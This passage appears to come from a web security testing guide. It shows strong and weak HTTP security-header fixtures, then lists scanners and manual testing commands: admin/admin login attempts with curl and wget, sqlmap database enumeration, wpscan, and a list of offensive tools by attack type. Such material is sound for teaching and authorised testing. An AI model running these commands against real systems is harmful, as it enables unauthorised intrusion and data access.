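    "Content-Security-Policy": "default-src 'self'",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Permissions-Policy": "geolocation=(), microphone=(), camera=()",
}
WEAK_HEADERS = {
    "Content-Security-Policy": "default-src 'self' 'unsafe-inline'",
    "X-Frame-Options": "ALLOWALL",
    "Strict-Transport-Security": "max-age=300",
    "X-Powered-By": "PHP/7.4.3",
}
```

Feed it the header dictionary from any HTTP client response; a failing result in CI after a deployment is a cheap way to catch a reverse proxy or .htaccess change that silently dropped a header.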

🔧 Security Testing Tools

Automated Scanners

🕷️ OWASP ZAP

Free web application security scanner with GUI and API support

🔍 Burp Suite

Professional web security testing platform with extensive features

⚡ Nuclei

Fast vulnerability scanner based on templates

🎯 Nikto

Web server scanner for multiple vulnerabilities

Manual Testing Commands

# Command line tools
curl -X POST -d "username=admin&password=admin" http://target.com/login
wget --post-data="username=admin&password=admin" http://target.com/login
sqlmap -u "http://target.com/page.php?id=1" --dbs
wpscan --url http://target.com --enumerate ap,at,cb,dbe
nikto -h target.com
nuclei -u target.com

# Specialized Tools by Vulnerability
# SQL Injection: sqlmap, jSQL, bbqSQL, NoSQLMap
# XSS Testing: XSStrike, Dalfox, XSSHunter, beef-xss
# XXE Testing: XXEinjector, Burp XXE Scanner
# Deserialization: ysoserial, ysoserial.net, pickle-payload
